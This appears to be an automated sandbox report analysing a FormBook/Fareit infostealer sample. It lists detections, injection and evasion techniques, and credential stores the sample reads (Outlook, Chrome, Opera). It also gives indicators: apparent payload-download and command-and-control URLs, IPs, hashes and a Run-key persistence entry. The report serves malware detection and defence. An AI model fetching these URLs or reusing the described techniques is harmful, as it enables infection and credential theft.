                Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.330250458.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.346098625.0000000005E10000.00000004.00000001.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 0000000A.00000000.334442837.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.353081870.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.380728239.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Tries to steal Mail credentials (via file / registry access)Show sources
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                Remote Access Functionality:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsShared Modules1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection612Obfuscated Files or Information3Credential API Hooking1System Information Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Software Packing1Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSecurity Software Discovery221Distributed Component Object ModelCredential API Hooking1Scheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRootkit1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection612Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 552851 Sample: WZ454554.exe Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 6 other signatures 2->78 10 WZ454554.exe 1 17 2->10         started        process3 dnsIp4 56 cdn.discordapp.com 162.159.130.233, 443, 49746, 49747 CLOUDFLARENETUS United States 10->56 46 C:\Users\user\Contacts\Hyrzbcwcas.exe, PE32 10->46 dropped 48 C:\Users\...\Hyrzbcwcas.exe:Zone.Identifier, ASCII 10->48 dropped 96 Tries to detect virtualization through RDTSC time measurements 10->96 98 Injects a PE file into a foreign processes 10->98 15 WZ454554.exe 10->15         started        file5 signatures6 process7 signatures8 100 Modifies the context of a thread in another process (thread injection) 15->100 102 Maps a DLL or memory area into another process 15->102 104 Sample uses process hollowing technique 15->104 106 Queues an APC in another process (thread injection) 15->106 18 explorer.exe 2 15->18 injected process9 dnsIp10 50 sentlogisticsja.com 34.102.136.180, 49817, 49819, 49820 GOOGLEUS United States 18->50 52 www.sentlogisticsja.com 18->52 54 www.senerants.tech 18->54 80 System process connects to network (likely due to code injection or exploit) 18->80 22 help.exe 18 18->22         started        26 Hyrzbcwcas.exe 13 18->26         started        29 Hyrzbcwcas.exe 14 18->29         started        31 2 other processes 18->31 signatures11 process12 dnsIp13 42 C:\Users\user\AppData\...\75Alogrv.ini, data 22->42 dropped 44 C:\Users\user\AppData\...\75Alogri.ini, data 22->44 dropped 82 Detected FormBook malware 22->82 84 Tries to steal Mail credentials (via file / registry access) 22->84 86 Tries to harvest and steal browser information (history, passwords, etc) 22->86 94 2 other signatures 22->94 33 cmd.exe 2 22->33         started        58 cdn.discordapp.com 26->58 88 Multi AV Scanner detection for dropped file 26->88 90 Tries to detect virtualization through RDTSC time measurements 26->90 92 Injects a PE file into a foreign processes 26->92 36 Hyrzbcwcas.exe 26->36         started        60 162.159.135.233, 443, 49751 CLOUDFLARENETUS United States 29->60 62 cdn.discordapp.com 29->62 38 Hyrzbcwcas.exe 29->38         started        file14 signatures15 process16 signatures17 64 Tries to harvest and steal browser information (history, passwords, etc) 33->64 40 conhost.exe 33->40         started        66 Modifies the context of a thread in another process (thread injection) 36->66 68 Maps a DLL or memory area into another process 36->68 70 Sample uses process hollowing technique 36->70 process18

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                WZ454554.exe22%VirustotalBrowse
                WZ454554.exe39%ReversingLabsWin32.Infostealer.Fareit

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Contacts\Hyrzbcwcas.exe39%ReversingLabsWin32.Infostealer.Fareit

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                17.0.Hyrzbcwcas.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                21.0.Hyrzbcwcas.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.WZ454554.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                17.1.Hyrzbcwcas.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                21.1.Hyrzbcwcas.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                17.0.Hyrzbcwcas.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.0.WZ454554.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                21.2.Hyrzbcwcas.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                17.2.Hyrzbcwcas.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                21.0.Hyrzbcwcas.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.1.WZ454554.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                9.0.WZ454554.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.sentlogisticsja.com/m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS0%Avira URL Cloudsafe
                http://www.sentlogisticsja.com/m9g2/0%Avira URL Cloudsafe
                http://www.sentlogisticsja.com0%Avira URL Cloudsafe
                www.spiegelpherese.com/m9g2/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sentlogisticsja.com
                		34.102.136.180
                		truefalse
                  		high
                  cdn.discordapp.com
                  		162.159.130.233
                  		truefalse
                    		high
                    www.senerants.tech
                    		unknown
                    		unknownfalse
                      		high
                      www.sentlogisticsja.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.sentlogisticsja.com/m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tSfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sentlogisticsja.com/m9g2/false
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.discordapp.com/attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzffalse
                          		high
                          www.spiegelpherese.com/m9g2/true
                          • Avira URL Cloud: safe
                          		low

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.sentlogisticsja.comhelp.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          162.159.130.233
                          		cdn.discordapp.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          34.102.136.180
                          		sentlogisticsja.comUnited States
                          		15169GOOGLEUSfalse
                          162.159.135.233
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:552851
                          Start date:13.01.2022
                          Start time:20:21:22
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 19s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:WZ454554.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:32
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@16/11@7/3
                          EGA Information:
                          • Successful, ratio: 40%
                          HDC Information:
                          • Successful, ratio: 52.2% (good quality ratio 48.3%)
                          • Quality average: 74.2%
                          • Quality standard deviation: 30.1%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 69
                          • Number of non-executed functions: 103
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
                          • Execution Graph export aborted for target Hyrzbcwcas.exe, PID 1840 because there are no executed function
                          • Execution Graph export aborted for target Hyrzbcwcas.exe, PID 7108 because there are no executed function
                          • Execution Graph export aborted for target WZ454554.exe, PID 6628 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          20:22:16API Interceptor1x Sleep call for process: WZ454554.exe modified
                          20:22:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hyrzbcwcas C:\Users\user\Contacts\sacwcbzryH.url
                          20:22:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hyrzbcwcas C:\Users\user\Contacts\sacwcbzryH.url
                          20:22:44API Interceptor2x Sleep call for process: Hyrzbcwcas.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Hyrzbcwcasllzbwmlqsydewtjitxnzf[1]
                          Process:C:\Users\user\Desktop\WZ454554.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):488448
                          Entropy (8bit):7.979988874642134
                          Encrypted:false
                          SSDEEP:12288:66Jh5Vm30sbrl82V3DhCpxqZ03OGS6JbJgf6C8v:S0+rl8+DhC4i3QNE
                          MD5:6CE484DDB0699821883415A6A3C03422
                          SHA1:80A0E4C0C07323D6A8E50270286E91CB3A2AEFD4
                          SHA-256:A2AC9FC2A4FE4F810D426A3DF72C20D6D9894F31AD8A71FEF75CF2E13D8357F2
                          SHA-512:FC2DFAAB773C4AD50157A7059C258CE9C36F7B7B0BC0A60893A7B793B1E3F4D873B3AD1C54CC3C60E49DAB697688BD6252D3B28F6E78C157F95C98B3988E7E49
                          Malicious:false
                          Reputation:unknown
                          Preview: ...9".J[..W.6..j.9(.S..w...9'n...FJO....s./......O..].".Q.h.......K...m.....t0.|3.l..d.I../.0...a....`r-.M....#t8..e.NU...]..^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*...7(..b.U....^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*..-.....XLt:..<..M..... ...LB.bdo..#m..|*.e.(.....M.p93v95.flg....]...B..'g.....n...&...'g..B......Z@.pJo...s...3...]....J\j.....G...:.k.+m..%m.. ....Tq.rT..t=@..~.....A.J..e.u.Q..o..~-..........Y..e.".....Vr<........../)..\.M............i.$y...A.A.A...Yb.w!..z..M]j...A.<U.|.S.-.]...?...$.F.V.Z..|....p.9.....N..........6......J.L.+..8(."..~o.W:..Co.*_..&zu2.pf.`..10H..mL.y.*..X..[j......_y(r.]h0...."B..m.?....*......Ym3.z.?.N.j....G[h.\.'....4..1..u%.^...V.Un...[q?.....f..<*.........*s(....^..v...[`.N... q!.IIT.M]y-.B<,.~..9...\..f..,.MIP.....3..V.N.y1.v..=.T.85..Ua}:!..Q@+..B4.h....KD!.9.=.(....OL.j..IL...p..._t......^.N..."4.`.`.ami."..,.$..}?..,...n..."a%.=...L...&`.C.....?..KA.....7.V...e.(.....KL.Uw7
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Hyrzbcwcasllzbwmlqsydewtjitxnzf[1]
                          Process:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):488448
                          Entropy (8bit):7.979988874642134
                          Encrypted:false
                          SSDEEP:12288:66Jh5Vm30sbrl82V3DhCpxqZ03OGS6JbJgf6C8v:S0+rl8+DhC4i3QNE
                          MD5:6CE484DDB0699821883415A6A3C03422
                          SHA1:80A0E4C0C07323D6A8E50270286E91CB3A2AEFD4
                          SHA-256:A2AC9FC2A4FE4F810D426A3DF72C20D6D9894F31AD8A71FEF75CF2E13D8357F2
                          SHA-512:FC2DFAAB773C4AD50157A7059C258CE9C36F7B7B0BC0A60893A7B793B1E3F4D873B3AD1C54CC3C60E49DAB697688BD6252D3B28F6E78C157F95C98B3988E7E49
                          Malicious:false
                          Reputation:unknown
                          Preview: ...9".J[..W.6..j.9(.S..w...9'n...FJO....s./......O..].".Q.h.......K...m.....t0.|3.l..d.I../.0...a....`r-.M....#t8..e.NU...]..^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*...7(..b.U....^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*..-.....XLt:..<..M..... ...LB.bdo..#m..|*.e.(.....M.p93v95.flg....]...B..'g.....n...&...'g..B......Z@.pJo...s...3...]....J\j.....G...:.k.+m..%m.. ....Tq.rT..t=@..~.....A.J..e.u.Q..o..~-..........Y..e.".....Vr<........../)..\.M............i.$y...A.A.A...Yb.w!..z..M]j...A.<U.|.S.-.]...?...$.F.V.Z..|....p.9.....N..........6......J.L.+..8(."..~o.W:..Co.*_..&zu2.pf.`..10H..mL.y.*..X..[j......_y(r.]h0...."B..m.?....*......Ym3.z.?.N.j....G[h.\.'....4..1..u%.^...V.Un...[q?.....f..<*.........*s(....^..v...[`.N... q!.IIT.M]y-.B<,.~..9...\..f..,.MIP.....3..V.N.y1.v..=.T.85..Ua}:!..Q@+..B4.h....KD!.9.=.(....OL.j..IL...p..._t......^.N..."4.`.`.ami."..,.$..}?..,...n..."a%.=...L...&`.C.....?..KA.....7.V...e.(.....KL.Uw7
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Hyrzbcwcasllzbwmlqsydewtjitxnzf[2]
                          Process:C:\Users\user\Contacts\Hyrzbcwcas.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):488448
                          Entropy (8bit):7.979988874642134
                          Encrypted:false
                          SSDEEP:12288:66Jh5Vm30sbrl82V3DhCpxqZ03OGS6JbJgf6C8v:S0+rl8+DhC4i3QNE
                          MD5:6CE484DDB0699821883415A6A3C03422
                          SHA1:80A0E4C0C07323D6A8E50270286E91CB3A2AEFD4
                          SHA-256:A2AC9FC2A4FE4F810D426A3DF72C20D6D9894F31AD8A71FEF75CF2E13D8357F2
                          SHA-512:FC2DFAAB773C4AD50157A7059C258CE9C36F7B7B0BC0A60893A7B793B1E3F4D873B3AD1C54CC3C60E49DAB697688BD6252D3B28F6E78C157F95C98B3988E7E49
                          Malicious:false
                          Reputation:unknown
